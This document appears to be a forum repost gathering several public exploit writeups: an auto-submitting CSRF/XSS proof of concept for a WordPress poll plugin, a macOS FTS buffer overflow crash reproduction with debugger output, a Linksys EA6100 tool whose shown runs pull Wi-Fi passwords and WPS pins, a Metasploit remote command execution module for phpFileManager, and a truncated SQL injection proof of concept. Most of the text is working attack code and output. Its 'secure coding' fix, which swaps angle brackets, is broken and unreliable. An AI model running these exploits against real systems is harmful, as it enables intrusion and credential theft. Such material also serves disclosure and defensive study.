Massaro

http://www.mbsd.jp/Whitepaper/smtpi.pdf.

Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF Exploit Author : Ahn Sung Jun Date : 2015-12-09 Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/ Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip Version : 1.1.3 Tested On : kail linux Iceweasel =========================================== Vulnerable Code : wp_easy_poll.php if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){ global $wpdb; $pc = new poll_class; /* Line 859 */ $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']); $wpdb->insert( $wpdb->prefix.$pc->table, $insert ); $new_poll_id = $wpdb->insert_id; $p_anss = $_REQUEST['p_anss']; if(is_array($p_anss) and $new_poll_id){ foreach($p_anss as $key => $value){ if($value != ''){ $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1); $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 ); } } } =========================================== POC (XSS & CSRF) <html> <body onload="javascript:document.forms[0].submit()"> <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post"> <input type="hidden" name="action" value="p_add" /> <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" /> <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/> <input type="submit" name="submit" value="Submit" class="button" /> </form> </html> =========================================== Secure Coding if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){ global $wpdb; $pc = new poll_class; /* Secure Coding */ $_REQUEST['p_ques'] = str_replace("script", "x-script", $_REQUEST['p_ques']); $_REQUEST['p_ques'] = str_replace("<", ">", $_REQUEST['p_ques']); $_REQUEST['p_ques']= str_replace(">" ,"<", $_REQUEST['p_ques']); $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']); $wpdb->insert( $wpdb->prefix.$pc->table, $insert ); $new_poll_id = $wpdb->insert_id; $p_anss = $_REQUEST['p_anss']; if(is_array($p_anss) and $new_poll_id){ foreach($p_anss as $key => $value){ if($value != ''){ $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1); $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 ); } } } Sursa: https://www.exploit-db.com/exploits/38915/.

MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow Credit: Maksymilian Arciemowicz ( CXSECURITY ) Website: http://cxsecurity.com/ http://cert.cx/ Affected software: - MACOS's Commands such as: ls, find, rm - iPhone 4s and later, - Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes - Apple TV (4th generation) - probably more Apple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. PoC: Create an direcotry and perform the following actions: # for i in {1..1024}; do mkdir B && cd B; done ... cd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory If such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. # for i in {1..1024}; do cd .. ; done Then you can perform recursive 'ls' command. Let's run it ten times: # for i in {1..10}; do ls -laR > /dev/null; done ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory Segmentation fault: 11 Segmentation fault: 11 Segmentation fault: 11 ls: B: No such file or directory ls: B: No such file or directory Segmentation fault: 11 ls: B: No such file or directory ls: B: No such file or directory crash randometly. Let's see valgrind and lldb LLDB: ... /B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ./B/B/B/B/B/B/B/B/..../B/B: Process 987 stopped * thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 libsystem_c.dylib`strlen: -> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi 0x7fff97ab6d3a <+26>: andq $0xf, %rcx 0x7fff97ab6d3e <+30>: orq $-0x1, %rax (lldb) x/x $rdi error: memory read failed for 0xfeb66c00 (lldb) register read General Purpose Registers: rax = 0x00000000ffffffff rbx = 0x00000000ffffffff rcx = 0x00000000feb66c08 rdx = 0x00000000feb66c08 rdi = 0x00000000feb66c00 rsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 rbp = 0x00007fff5fbfe710 rsp = 0x00007fff5fbfe710 ... rip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 ... (lldb) bt * thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) * frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 frame #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 frame #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 frame #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 frame #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 frame #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 frame #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 frame #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 frame #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 frame #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 === Time for Valgrind ============= B/B/B/B/B/../B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ==1009== Invalid write of size 1 ==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100001DAD: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== by 0x104809C8D: ??? ==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd ==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100001B92: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== by 0x104809C8D: ??? ==1009== ./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: ==1009== Invalid read of size 1 ==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x1000024A7: ??? (in /bin/ls) ==1009== by 0x100001CFC: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd ==1009== ==1009== ==1009== Process terminating with default action of signal 11 (SIGSEGV) ==1009== Access not within mapped region at address 0x102D20318 ==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x1000024A7: ??? (in /bin/ls) ==1009== by 0x100001CFC: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== If you believe this happened as a result of a stack ==1009== overflow in your program's main thread (unlikely but ==1009== possible), you can try to increase the size of the ==1009== main thread stack using the --main-stacksize= flag. ==1009== The main thread stack size used in this run was 8388608. ==1009== ==1009== HEAP SUMMARY: ==1009== in use at exit: 1,671,999 bytes in 6,025 blocks ==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated ==1009== ==1009== LEAK SUMMARY: ==1009== definitely lost: 519 bytes in 6 blocks ==1009== indirectly lost: 104 bytes in 6 blocks ==1009== possibly lost: 0 bytes in 0 blocks ==1009== still reachable: 1,645,151 bytes in 5,819 blocks ==1009== suppressed: 26,225 bytes in 194 blocks ==1009== Rerun with --leak-check=full to see details of leaked memory ==1009== ==1009== For counts of detected and suppressed errors, rerun with: -v ==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) Segmentation fault: 11 MacMini:SCANME cxsecurity$ It looks like a buffer overflow in memmove(). Code http://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c The same issue for 'find' which may be used in cron scripts like ./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print ./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print ./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days ./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; Let's see valgrind output. MacMini:SCANME cxsecurity$ valgrind find . -name "R" ==1055== Memcheck, a memory error detector ==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==1055== Command: find . -name R ==1055== find: ./.Trashes: Permission denied ==1055== Invalid write of size 2 ==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1000013FA: ??? (in /usr/bin/find) ==1055== by 0x1000052AD: ??? (in /usr/bin/find) ==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) ==1055== by 0x3: ??? ==1055== by 0x10480CC7F: ??? ==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd ==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1000013FA: ??? (in /usr/bin/find) ==1055== by 0x1000052AD: ??? (in /usr/bin/find) ==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) ==1055== by 0x3: ??? ==1055== by 0x10480CC7F: ??? ... Invalid memory write without crashing. BTW: Many vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc. ====== References =================================== https://cxsecurity.com/issue/WLB-2014040027 https://cxsecurity.com/cveshow/CVE-2014-4433/ https://cxsecurity.com/cveshow/CVE-2014-4434/ https://cxsecurity.com/issue/WLB-2013110059 https://cxsecurity.com/cveshow/CVE-2013-6799/ https://cxsecurity.com/issue/WLB-2010040284 https://cxsecurity.com/cveshow/CVE-2010-0105/ https://cxsecurity.com/issue/WLB-2005090063 ====== Thanks =================================== Kacper and Smash_ from DEVILTEAM for technical support. ====== Credit =================================== Maksymilian Arciemowicz from cxsecurity.com http://cxsecurity.com/ http://cert.cx/ http://cifrex.org/ Sursa: https://www.exploit-db.com/exploits/38917/.

Hello folks, welcome to the first of a four part blog mini-series on firmware and embedded devices. My name is Matt Bergin and i'll be guiding you through the series. We plan to release each part of the series on the Friday of each week in December. The release of the final part in our series is dependent on our responsible disclosure timeline holding for a finding, but we're pretty confident. We're going to start slowly and with something simple. Today's tale is about a little access point that tried and tried but just couldn't keep its mouth shut. If it has an IP it'll talk, and what it says you might not like. Though, we tried to make it stop (see the timeline in the advisory), it didn't seem to matter to the manufacturer. So here we are: an 0day to help start your holiday season. Sincerely, KoreLogic Onward and upward! You can purchase the vulnerable device and download the corresponding firmware here: Linksys Official Support - Linksys EA6100 AC1200 Dual-Band Smart Wi-Fi Wireless Router We'll start off by doing what every other blog on firmware reversing tells you to do: run binwalk. In this case, it will work without any changes and you'll end up with a sub-directory containing the files you're going to want. If you would rather work off of a live system, JTAG pins are on the board and the console can be found with your baudrate set to 115200. # ls bin etc JNAP libexec mnt proc sbin tmp var dev home lib linuxrc opt root sys usr www # cd www # ls bootloader_info.cgi incoming_log.txt security_log.txt cgi-bin jcgi speedtest_info.cgi dhcp_log.txt JNAP sysinfo.cgi ezwifi_cfg.cgi license.pdf ui get_counter_info.cgi outgoing_log.txt usbinfo.cgi getstinfo.cgi qos_info.cgi There are a many CGI files of interest, I will only talk about a few. # ls -la sysinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 sysinfo.cgi -> /www/ui/cgi/sysinfo.cgi # ls -la getstinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 sysinfo.cgi -> /www/ui/cgi/getstinfo.cgi # ls -la sysinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 ezwifi_cfg.cgi -> /www/ui/cgi/ezwifi_cfg.cgi These files are accessible from an unauthenticated perspective and allow the pentester to perform a variety of actions. A pentesting team with one person who is simultaneously conducting attacks from an already established network location and a geographically separate person oriented near the access point who desires access to the affected network could then use attacks like this to their advantage. This approach will reduce the need for internet facing assets whose use may compromise the engagement while allowing for a higher degree of persistency and anonymity. These attacks are a good example of why enterprise-grade wireless security is so important. $ python kl-linksys-ea6100-auth-bypass.py --help Brought to you by Level at KoreLogic Usage: kl-linksys-ea6100-auth-bypass.py [options] Options: -h, --help show this help message and exit --host=HOST Target IP address --sysinfo Get target system information --getpwhash Get target wireless password hash --getclearpw Get target wireless SSID and cleartext password --isdefault Check if target is running the default admin credential (if yes, obtain passphrase) --resetwifi Reset the access point security (requires default passphrase) --poisonwifi Poison the access point security settings --getwpspin Get the WPS pin for the target he switches above and their corresponding description convey the functionality built into our exploit. The first is --isdefault which works by sending the access point management interface a JNAP action over HTTP. The JNAP functionality within the EA series access points has been discussed previously; see for example https://github.com/Qanan/Linksys-JNAP-Siphon This tool does indeed siphon out some interesting information, even information that is redundant to what we obtain through separate methods. While it used to be quite popular for the default admin account in these types of devices to just be admin/admin we found that is no longer the case for the EA series. Instead we found a (seemingly) random password on the label for our hardware. We didn't look, but lets just hope it isn't based on the serial number of the device or any other predicatable value really. So, what does --isdefault do? It sends an HTTP request to the access point with a header name X-JNAP-Action whose value is a URL. Example: 404 Page Not Found The access point will return an HTTP 200 with a JSON string. The string contains a key named 'output' which also contains a JSON value. This value has a key named 'isAdminPasswordDefault' and contains a boolean indicating whether or not the password has been changed. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --isdefault Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Checking if administrator passphrase is default - [!] Passphrase is not default I changed the password, but what if I had not yet changed it? I mean, it's not admin/admin anymore so I should good right? Wrong. The access point will tell _anyone_ the default admin password regardless if it's set or not. In cases where isAdminPasswordDefault is True, the exploit will obtain the default password in clear text. You'll see this in action later on. What about getting access to the wireless network? Well, there are a few options. If you don't mind cracking hashes then --getpwhash will make an HTTP call to the access point at getstinfo.cgi which will then return the values shown below. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getpwhash Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Obtaining wireless password hash - SSID=[redacted] Passphrase=[redacted] What if you want to use WPS instead? No problem, just run --getwpspin. This makes an HTTP call to sysinfo.cgi and then parses the response for the value. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getwpspin Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Getting WPS pin - WPS PIN: [redacted] If you don't want to use any of those or maybe you just want the WPA2 password, you can use --getclearpw. This also makes a HTTP call to sysinfo.cgi, except this will search for the wireless security settings which are stored in cleartext. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getclearpw Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Obtaining wireless ssid and password - wl0 Passphrase: [redacted] wl0 SSID: [redacted] wl1 Passphrase: [redacted] wl1 SSID: [redacted] If you're looking for a "poison the well" type attack, then --poisonwifi is for you. This switch makes an HTTP call that will reconfigure NVRAM so the next time a change is applied your poisoned wireless settings will also get applied. Once the HTTP call to poison the settings has taken place, the exploit will call --getclearpw and search for your poisoned settings to ensure poisoning has taken place. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --poisonwifi Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Poisoning wireless ssid configuration [+] Access point ssid settings poisoned. An administrator will need to hit Apply anywhere in the UI Say stealth doesn't matter and this attack vector is still your best shot for some reason, if --isdefault is True the exploit can automatically reconfigure the wireless settings for quick network access. Using the switch --resetwifi will run --isdefault and if it returns True, it will then run a separate JNAP action that will perform the reconfiguration. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --resetwifi Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Resetting the access point security [+] Admin password is default, asking for the password [+] Got the passphrase: [redacted] [+] AP will now restart with the SSID and passphrase: korelogic/korelogic and korelogic2/korelogic2 Sursa: https://blog.korelogic.com/blog/2015/12/04/linksys-0day-unauth-infodisco.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'phpFileManager 0.9.8 Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file. }, 'License' => MSF_LICENSE, 'Author' => [ 'hyp3rlinx', # initial discovery 'Jay Turla' # msf ], 'References' => [ [ 'EDB', '37709' ], [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website ], 'Privileged' => false, 'Payload' => { 'Space' => 2000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => %w{ unix win }, 'Arch' => ARCH_CMD, 'Targets' => [ ['phpFileManager / Unix', { 'Platform' => 'unix' } ], ['phpFileManager / Windows', { 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Aug 28 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']), ],self.class) end def check txt = Rex::Text.rand_text_alpha(8) res = http_send_command("echo #{txt}") if res && res.body =~ /#{txt}/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def push uri = normalize_uri(target_uri.path) # To push the Enter button res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'frame' => '3', 'pass' => '' # yep this should be empty } }) if res.nil? vprint_error("#{peer} - Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 print_good("#{peer} - Logged in to the file manager") cookie = res.get_cookies cookie else fail_with(Failure::Unknown, "#{peer} - Error entering the file manager") end end def http_send_command(cmd) cookie = push res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookie, 'vars_get' => { 'action' => '6', 'cmd' => cmd } }) unless res && res.code == 200 fail_with(Failure::Unknown, "Failed to execute the command.") end res end def exploit http_send_command(payload.encoded) end end Sursa: https://www.exploit-db.com/exploits/38900/.

Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability Author : WICS Date : 7/12/2015 Software Link : https://wordpress.org/plugins/polls-widget/ Affected Version: 1.0.7 and below Overview: Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll. This plugin has 2000+ active installations. Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id line no. 36 $question_id=$_POST['question_id']; .... .... line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A); print_r(json_encode($answer, JSON_FORCE_OBJECT)); this script is vulnerable to union based sql injection with column count 2 POC http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues in post data, add this question_id=1337 union select 